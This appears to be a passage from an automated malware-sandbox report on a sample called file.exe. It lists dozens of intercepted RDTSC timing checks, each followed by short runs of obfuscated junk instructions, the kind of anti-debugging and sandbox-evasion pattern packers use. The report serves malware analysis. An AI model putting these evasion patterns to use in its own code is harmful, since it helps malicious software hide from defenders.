        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FD2B second address: 85FD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FD32 second address: 85FD52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C1C540h 0x00000009 jmp 00007F48A0C1C53Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86BF70 second address: 86BF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E8h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86BB10 second address: 86BB29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C540h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F89F second address: 86F8D9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F48A0C206DCh 0x00000008 jbe 00007F48A0C206D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007F48A0C206E2h 0x00000017 jmp 00007F48A0C206E4h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F8D9 second address: 86F8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876A67 second address: 876A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876A6B second address: 876A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876A77 second address: 876A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876A7B second address: 876A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876A81 second address: 876AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F48A0C206D8h 0x0000000c jmp 00007F48A0C206DAh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jno 00007F48A0C206D6h 0x0000001b pushad 0x0000001c popad 0x0000001d pop esi 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876AA9 second address: 876AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876AAF second address: 876AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8807BB second address: 8807C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8807C3 second address: 8807E5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F48A0C206DEh 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007F48A0C206F5h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8807E5 second address: 8807E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880632 second address: 880671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C206DEh 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F48A0C206E4h 0x00000017 popad 0x00000018 popad 0x00000019 jnp 00007F48A0C20706h 0x0000001f push eax 0x00000020 push edx 0x00000021 ja 00007F48A0C206D6h 0x00000027 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880671 second address: 880688 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C53Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880688 second address: 88068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8837EF second address: 883806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F48A0C1C53Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883806 second address: 88380C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88380C second address: 883812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883812 second address: 883829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F48A0C206E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883829 second address: 88382F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A35A second address: 88A364 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F48A0C206DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A792C second address: 7A793A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F48A0C1C536h 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889494 second address: 88949E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F48A0C206D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88949E second address: 8894A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A02F second address: 88A03A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A03A second address: 88A040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E90B second address: 89E92A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F48A0C206E9h 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E92A second address: 89E93B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jnp 00007F48A0C1C536h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E93B second address: 89E947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E947 second address: 89E966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C1C547h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E966 second address: 89E982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F48A0C206E7h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A11B9 second address: 8A11C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE802 second address: 8AE80C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F48A0C206D6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE983 second address: 8AE987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE987 second address: 8AE9AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F48A0C206DCh 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C44CD second address: 8C44D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C44D6 second address: 8C44DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4915 second address: 8C4919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4919 second address: 8C491D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6BE1 second address: 8C6BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F48A0C1C536h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9AD4 second address: 8C9AEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F48A0C206E3h 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9AEF second address: 8C9AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9AF3 second address: 8C9B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 js 00007F48A0C206E8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F48A0C206D6h 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9B0A second address: 8C9B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CC802 second address: 8CC81E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CE853 second address: 8CE857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CE857 second address: 8CE88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F48A0C206DCh 0x0000000c jmp 00007F48A0C206E1h 0x00000011 push ebx 0x00000012 jg 00007F48A0C206D6h 0x00000018 jng 00007F48A0C206D6h 0x0000001e pop ebx 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E8910 second address: 7E8923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C53Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0321 second address: 49A0355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx ebx, cx 0x0000000e mov ch, 75h 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F48A0C206DBh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0355 second address: 49A0384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F48A0C1C541h 0x0000000a sbb ecx, 61DBAE16h 0x00000010 jmp 00007F48A0C1C541h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0616 second address: 49C061A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C061A second address: 49C0637 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0637 second address: 49C069C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F48A0C206E7h 0x00000009 adc al, FFFFFFAEh 0x0000000c jmp 00007F48A0C206E9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F48A0C206E0h 0x00000018 add ecx, 551E6C28h 0x0000001e jmp 00007F48A0C206DBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C069C second address: 49C06A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06A0 second address: 49C06A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06A6 second address: 49C06AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06AC second address: 49C06B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06B0 second address: 49C0740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F48A0C1C53Bh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov ax, C301h 0x00000018 pushfd 0x00000019 jmp 00007F48A0C1C53Eh 0x0000001e add ecx, 0C79F418h 0x00000024 jmp 00007F48A0C1C53Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov edx, eax 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov si, 29C7h 0x00000035 pushad 0x00000036 call 00007F48A0C1C53Ah 0x0000003b pop esi 0x0000003c jmp 00007F48A0C1C53Bh 0x00000041 popad 0x00000042 popad 0x00000043 xchg eax, ecx 0x00000044 jmp 00007F48A0C1C546h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0740 second address: 49C0744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0744 second address: 49C074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C074A second address: 49C0760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C206E2h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0760 second address: 49C0764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0764 second address: 49C07AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a mov ecx, edi 0x0000000c pushfd 0x0000000d jmp 00007F48A0C206E9h 0x00000012 sbb cl, FFFFFFD6h 0x00000015 jmp 00007F48A0C206E1h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov esi, edi 0x00000022 mov edx, 4DCE926Ah 0x00000027 popad 0x00000028 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C07AC second address: 49C07B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C07B2 second address: 49C07D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop edx 0x0000000e call 00007F48A0C206DEh 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C07D0 second address: 49C07D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C07D6 second address: 49C07DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C07DA second address: 49C0838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov al, 49h 0x0000000c pushfd 0x0000000d jmp 00007F48A0C1C541h 0x00000012 sub esi, 526A3DF6h 0x00000018 jmp 00007F48A0C1C541h 0x0000001d popfd 0x0000001e popad 0x0000001f lea eax, dword ptr [ebp-04h] 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F48A0C1C53Ah 0x0000002b jmp 00007F48A0C1C545h 0x00000030 popfd 0x00000031 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0944 second address: 49C0948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0948 second address: 49C094E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C094E second address: 49C0974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F48A0C206DEh 0x00000009 xor esi, 51A31A18h 0x0000000f jmp 00007F48A0C206DBh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C09F3 second address: 49C0A0B instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 leave 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F48A0C1C53Ch 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A0B second address: 49C0A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A0F second address: 49C0A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A15 second address: 49C0044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F48A0C206DCh 0x00000009 adc ax, 62C8h 0x0000000e jmp 00007F48A0C206DBh 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 xor ebx, ebx 0x00000023 cmp eax, 00000000h 0x00000026 je 00007F48A0C20825h 0x0000002c xor eax, eax 0x0000002e mov dword ptr [esp], 00000000h 0x00000035 mov dword ptr [esp+04h], 00000000h 0x0000003d call 00007F48A4FCC22Bh 0x00000042 mov edi, edi 0x00000044 pushad 0x00000045 push ebx 0x00000046 movzx esi, dx 0x00000049 pop edx 0x0000004a popad 0x0000004b xchg eax, ebp 0x0000004c jmp 00007F48A0C206DEh 0x00000051 push eax 0x00000052 jmp 00007F48A0C206DBh 0x00000057 xchg eax, ebp 0x00000058 pushad 0x00000059 mov edi, eax 0x0000005b call 00007F48A0C206E0h 0x00000060 pushad 0x00000061 popad 0x00000062 pop eax 0x00000063 popad 0x00000064 mov ebp, esp 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0044 second address: 49C0048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0048 second address: 49C004C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C004C second address: 49C0052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0052 second address: 49C0065 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, F9h 0x00000005 movzx esi, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push FFFFFFFEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0065 second address: 49C006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C006B second address: 49C0088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 35B1h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F48A0C206D9h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 mov dx, DB7Ah 0x00000018 popad 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0088 second address: 49C00A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C540h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov edx, 36956182h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C00A5 second address: 49C00DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F48A0C206DFh 0x0000000b pop edx 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F48A0C206E5h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C00DF second address: 49C00F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C1C540h 0x00000009 rdtsc
